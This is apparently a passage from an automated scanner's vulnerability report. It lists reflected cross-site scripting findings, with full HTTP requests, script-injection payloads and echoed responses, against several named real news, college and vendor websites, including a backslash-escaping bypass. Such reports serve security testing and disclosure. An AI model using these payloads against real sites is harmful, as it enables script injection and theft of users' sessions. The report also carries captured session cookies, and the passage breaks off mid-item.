<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/satellitewaivers/?61465'><script>alert(1)</script>a06280160d2=1'>
...[SNIP]...

4.842. http://www.cbs6albany.com/sections/schoolclosures/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/schoolclosures/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4351'><script>alert(1)</script>5e3380a0e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/schoolclosures/?c4351'><script>alert(1)</script>5e3380a0e97=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:04 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:04 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/schoolclosures/?c4351'><script>alert(1)</script>5e3380a0e97=1'>
...[SNIP]...

4.843. http://www.cbs6albany.com/sections/sitemap/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/sitemap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload adc57'><script>alert(1)</script>d7b9d0c4880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/sitemap/?adc57'><script>alert(1)</script>d7b9d0c4880=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:56 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:56 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 40061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/sitemap/?adc57'><script>alert(1)</script>d7b9d0c4880=1'>
...[SNIP]...

4.844. http://www.cbs6albany.com/sections/sp-alerts/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/sp-alerts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e11ed'><script>alert(1)</script>5063f0c5775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/sp-alerts/?e11ed'><script>alert(1)</script>5063f0c5775=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:36 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:36 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/sp-alerts/?e11ed'><script>alert(1)</script>5063f0c5775=1'>
...[SNIP]...

4.845. http://www.cbs6albany.com/sections/thirdParty/iframe_header/ [taxonomy parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/thirdParty/iframe_header/

Issue detail

The value of the taxonomy request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c6a0'%3balert(1)//11741c449be was submitted in the taxonomy parameter. This input was echoed as 2c6a0';alert(1)//11741c449be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment2c6a0'%3balert(1)//11741c449be&trackstats=no HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:42:09 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 01:52:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<script type='text/javascript'>var freedom = new DartAds({domain: 'fbi.wrgb.cbs6albany',taxonomy: 'entertainment2c6a0';alert(1)//11741c449be',ref: 'cbs6albany.com',kw: '',extra: '',test: '',positions: 'Top' });
</script>
...[SNIP]...

4.846. http://www.cbs6albany.com/sections/traffic-events/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/traffic-events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ccbfe'><script>alert(1)</script>5970f590b45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/traffic-events/?ccbfe'><script>alert(1)</script>5970f590b45=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:01 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:01 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/traffic-events/?ccbfe'><script>alert(1)</script>5970f590b45=1'>
...[SNIP]...

4.847. http://www.cbs6albany.com/sections/traffic/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/traffic/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60e3e'><script>alert(1)</script>147cbe0ed3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/traffic/?60e3e'><script>alert(1)</script>147cbe0ed3a=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:22 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 28936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/traffic/?60e3e'><script>alert(1)</script>147cbe0ed3a=1'>
...[SNIP]...

4.848. http://www.cbs6albany.com/sections/tvlistings/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/tvlistings/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18fdb'><script>alert(1)</script>ea31e14ecf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/tvlistings/?18fdb'><script>alert(1)</script>ea31e14ecf8=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/tvlistings/?18fdb'><script>alert(1)</script>ea31e14ecf8=1'>
...[SNIP]...

4.849. http://www.cbs6albany.com/sections/videocopies/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/videocopies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e7b0'><script>alert(1)</script>20ab6d60dc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/videocopies/?5e7b0'><script>alert(1)</script>20ab6d60dc4=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:30:19 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:40:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/videocopies/?5e7b0'><script>alert(1)</script>20ab6d60dc4=1'>
...[SNIP]...

4.850. http://www.cbs6albany.com/sections/weather/7day/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/weather/7day/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 546eb'><script>alert(1)</script>a6747eb34cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/weather/7day/?546eb'><script>alert(1)</script>a6747eb34cf=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:20 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:20 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/weather/7day/?546eb'><script>alert(1)</script>a6747eb34cf=1'>
...[SNIP]...

4.851. http://www.cbs6albany.com/sections/web-links/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/web-links/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7fb2a'><script>alert(1)</script>adf56b952dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/web-links/?7fb2a'><script>alert(1)</script>adf56b952dc=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:22 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/web-links/?7fb2a'><script>alert(1)</script>adf56b952dc=1'>
...[SNIP]...

4.852. http://www.cbs6albany.com/sections/wrgb-talent/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/wrgb-talent/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1abcc'><script>alert(1)</script>d146c5acfd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/wrgb-talent/?1abcc'><script>alert(1)</script>d146c5acfd8=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

4.853. http://www.collegeanduniversity.net/herald/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.collegeanduniversity.net
Path:	/herald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc02"><script>alert(1)</script>f6e0bec01de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /herald/?1bc02"><script>alert(1)</script>f6e0bec01de=1 HTTP/1.1
Host: www.collegeanduniversity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:30:35 GMT
Server: Apache
Set-Cookie: CFID=23963352;expires=Mon, 21-Jan-2041 04:30:36 GMT;path=/
Set-Cookie: CFTOKEN=d929d8f4b82db578-D009724A-19B9-F336-D8F485B26C5987DC;expires=Mon, 21-Jan-2041 04:30:36 GMT;path=/
Set-Cookie: JSESSIONID=22306a9c07e3ea57fd98291165c132d6aa47;path=/
Set-Cookie: CUNET.SHOWDEBUG=0;path=/
Set-Cookie: CU2005FRONTAPPKEY.SHOWDEBUG=0;path=/
Set-Cookie: CID=175;expires=Mon, 21-Jan-2041 04:30:36 GMT;path=/
P3P: CP='ADMa DEVa OUR IND DSP NON COR'
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Find Online College Degrees - Top Online Universities at Collegeanduniversity.net</title>
<meta name="Descriptio
...[SNIP]...
<input type="hidden" name="ReturnURL" value="/herald/index.cfm?1bc02"><script>alert(1)</script>f6e0bec01de=1">
...[SNIP]...

4.854. http://www.mixpo.com/videoad/kD3_P_IRSdu0NijksWoruw/Chevrolet-LMA [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mixpo.com
Path:	/videoad/kD3_P_IRSdu0NijksWoruw/Chevrolet-LMA

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1c9a<script>alert(1)</script>3ef0ba5983c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videoad/kD3_P_IRSdu0NijksWoruwb1c9a<script>alert(1)</script>3ef0ba5983c/Chevrolet-LMA HTTP/1.1
Host: www.mixpo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 29 Jan 2011 04:37:23 GMT
Connection: close

<!DOCTYPE html>
<html>
<head>
   <title>Mixpo: Online VideoAds that Drive Response </title>
   <link rel="SHORTCUT ICON" href="/favicon.ico" type="image/x-icon" />
   <meta name="description" content=" Ma
...[SNIP]...
<p>Landing page, cannot find container for /videoad/kD3_P_IRSdu0NijksWoruwb1c9a<script>alert(1)</script>3ef0ba5983c/Chevrolet-LMA</p>
...[SNIP]...

4.855. http://www.moxiesoft.com/search.aspx [searchtext parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/search.aspx

Issue detail

The value of the searchtext request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c656\"%3balert(1)//75842e444dc was submitted in the searchtext parameter. This input was echoed as 2c656\\";alert(1)//75842e444dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /search.aspx?searchtext=2c656\"%3balert(1)//75842e444dc HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:06:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<![CDATA[
/*Clear Search Cookie*/EkSearch.clrCookie();/*Set search results*/document.getElementById('__ecmsearchresult$').innerHTML="Your search for 2c656\\";alert(1)//75842e444dc - did not match any documents.<br />
...[SNIP]...

4.856. http://www.moxiesoft.com/search.aspx [searchtext parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/search.aspx

Issue detail

The value of the searchtext request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3631'%3balert(1)//20ecdcf8d9 was submitted in the searchtext parameter. This input was echoed as a3631';alert(1)//20ecdcf8d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search.aspx?searchtext=a3631'%3balert(1)//20ecdcf8d9 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:06:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<br />";document.form1.searchtext.value = 'a3631';alert(1)//20ecdcf8d9';
WebForm_InitCallback();//]]>
...[SNIP]...

4.857. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70f75'%3balert(1)//84f766b9c15 was submitted in the REST URL parameter 1. This input was echoed as 70f75';alert(1)//84f766b9c15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 14:10:58 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en

